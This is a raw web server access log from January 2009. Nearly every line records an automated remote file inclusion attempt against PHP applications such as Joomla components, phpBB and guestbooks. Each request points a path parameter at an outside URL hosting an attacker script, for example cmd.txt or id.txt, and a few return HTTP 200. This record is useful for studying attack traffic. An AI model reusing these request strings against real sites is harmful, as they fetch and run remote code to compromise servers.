203.162.139.20 - - [06/Jan/2009:09:35:21 -0800] "GET /logs/access_080123.log/vwar//includes/functions_install.php?vwar_root=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
203.162.139.20 - - [06/Jan/2009:09:35:21 -0800] "GET /logs/access_080126.log/vwar//includes/functions_install.php?vwar_root=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
62.101.68.240 - - [06/Jan/2009:09:35:22 -0800] "GET /admin/classes/errors.php?error=http://user666.fileave.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:09:35:27 -0800] "GET /logs/access_080521.log//modules/4nAlbum/public/displayCategory.php?basepath=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
67.18.151.242 - - [06/Jan/2009:09:35:30 -0800] "GET /logs/access_080404.log/modules/My_eGallery/index.php?basepath=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:35:31 -0800] "GET /logs/access_080625.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.203.242 - - [06/Jan/2009:09:35:33 -0800] "GET /logs/access_080524.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:35:40 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:35:40 -0800] "GET /logs/access_080408.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:35:40 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:35:48 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:35:48 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:35:48 -0800] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
213.226.166.122 - - [06/Jan/2009:09:35:49 -0800] "GET /errors.php?error=http://www.inzerce-bazar.eu/foto-inzerce-bazar/pras/redm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:35:49 -0800] "GET /logs/access_071116.log//main.php?p=http://www.geocities.com/anamoza77/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:35:49 -0800] "GET /main.php?p=http://www.geocities.com/anamoza77/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:35:49 -0800] "GET /logs//main.php?p=http://www.geocities.com/anamoza77/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:35:49 -0800] "GET /logs/access_080630.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:09:35:50 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:09:35:50 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:09:35:50 -0800] "GET /logs/access_080111.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:09:35:51 -0800] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:35:51 -0800] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:36:02 -0800] "GET /logs/access_080528.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:36:05 -0800] "GET /logs/access_080510.log//main.php?p=http://www.geocities.com/anamoza77/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
89.249.18.13 - - [06/Jan/2009:09:36:13 -0800] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
89.249.18.13 - - [06/Jan/2009:09:36:13 -0800] "GET /logs/access_080522.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
89.249.18.13 - - [06/Jan/2009:09:36:13 -0800] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:36:14 -0800] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:36:24 -0800] "GET /logs/access_080408.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
89.249.18.13 - - [06/Jan/2009:09:36:29 -0800] "GET /logs/access_080524.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:36:33 -0800] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:36:35 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 200 3711 "-" "libwww-perl/5.79" "www.dmulk.com"
204.11.17.16 - - [06/Jan/2009:09:36:35 -0800] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:36:36 -0800] "GET /logs/errors.php?error=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:36:36 -0800] "GET /logs/access_081126.log/errors.php?error=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:36:36 -0800] "GET /errors.php?error=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:36:37 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:36:39 -0800] "GET /logs/access_081126.log/errors.php?error=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:36:39 -0800] "GET /errors.php?error=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:36:39 -0800] "GET /logs/errors.php?error=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:36:46 -0800] "GET /logs/access_081126.log/errors.php?error=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:09:36:46 -0800] "GET /logs/access_081202.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/anamoza77/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:09:36:46 -0800] "GET /logs/access_081202.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/sarahvirna/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:09:36:47 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/anamoza77/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:09:36:47 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/sarahvirna/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:09:36:47 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/anamoza77/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:09:36:47 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/sarahvirna/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:36:47 -0800] "GET /errors.php?error=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
200.40.34.42 - - [06/Jan/2009:09:36:48 -0800] "GET /logs/access_080613.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.174.114 - - [06/Jan/2009:09:36:48 -0800] "GET /logs/access_080901.log//includes/settings.inc.php?include_path=http://fuckserv.net/id?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
72.55.174.114 - - [06/Jan/2009:09:36:49 -0800] "GET /includes/settings.inc.php?include_path=http://fuckserv.net/id?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
72.55.174.114 - - [06/Jan/2009:09:36:49 -0800] "GET /logs//includes/settings.inc.php?include_path=http://fuckserv.net/id?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:36:51 -0800] "GET /logs/errors.php?error=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:36:53 -0800] "GET /logs/access_080809.log/errors.php?error=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:36:59 -0800] "GET /logs/access_080809.log/errors.php?error=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
94.101.145.110 - - [06/Jan/2009:09:37:07 -0800] "GET /logs/access_081027.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:37:10 -0800] "GET /logs/access_080613.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:37:19 -0800] "GET /logs/access_080224.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:37:21 -0800] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:37:22 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 200 3711 "-" "libwww-perl/5.79" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:37:23 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:37:23 -0800] "GET /logs/access_080302.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.40.34.42 - - [06/Jan/2009:09:37:24 -0800] "GET /logs/access_080330.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:37:27 -0800] "GET /logs/access_080809.log/errors.php?error=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
211.115.213.189 - - [06/Jan/2009:09:37:28 -0800] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.213.189 - - [06/Jan/2009:09:37:28 -0800] "GET /logs/access_080522.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.213.189 - - [06/Jan/2009:09:37:28 -0800] "GET /logs/access_080522.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.213.189 - - [06/Jan/2009:09:37:28 -0800] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.213.189 - - [06/Jan/2009:09:37:28 -0800] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.213.189 - - [06/Jan/2009:09:37:28 -0800] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.213.189 - - [06/Jan/2009:09:37:33 -0800] "GET /logs/access_080524.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.213.189 - - [06/Jan/2009:09:37:33 -0800] "GET /logs/access_080524.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:37:45 -0800] "GET /logs/access_080415.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:37:49 -0800] "GET /logs/access_080912.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:09:37:49 -0800] "GET /logs/access_080828.log/index.php?option=com_rwcards&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:09:37:51 -0800] "GET /index.php?option=com_rwcards&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 95139 "-" "libwww-perl/5.810" "www.dmulk.com"
72.232.203.242 - - [06/Jan/2009:09:37:52 -0800] "GET /logs/access_080522.log%20%20/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:09:37:52 -0800] "GET /logs/index.php?option=com_rwcards&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:37:54 -0800] "GET /logs/access_080128.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:09:38:02 -0800] "GET /logs/access_081207.log/index.php?option=com_rwcards&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:38:05 -0800] "GET /logs/access_080408.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:38:05 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:38:05 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
113.30.66.5 - - [06/Jan/2009:09:38:06 -0800] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.36.144.8 - - [06/Jan/2009:09:38:06 -0800] "GET /logs/access_081103.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:38:09 -0800] "GET /logs/access_081203.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
8.7.26.27 - - [06/Jan/2009:09:38:11 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:38:11 -0800] "GET /logs/access_080910.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
8.7.26.27 - - [06/Jan/2009:09:38:11 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
8.7.26.27 - - [06/Jan/2009:09:38:12 -0800] "GET /logs/access_081212.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:09:38:15 -0800] "GET /logs/access_081125.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/sarahvirna/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.232.203.242 - - [06/Jan/2009:09:38:19 -0800] "GET /logs/access_080524.log%20%20/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:38:19 -0800] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:09:38:20 -0800] "GET /logs/access_081125.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/anamoza77/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:38:24 -0800] "GET /logs/access_080912.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:38:25 -0800] "GET /logs/access_080223.log/errors.php?error=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:38:26 -0800] "GET /logs/access_080828.log/errors.php?error=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:38:26 -0800] "GET /logs/access_080223.log/errors.php?error=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
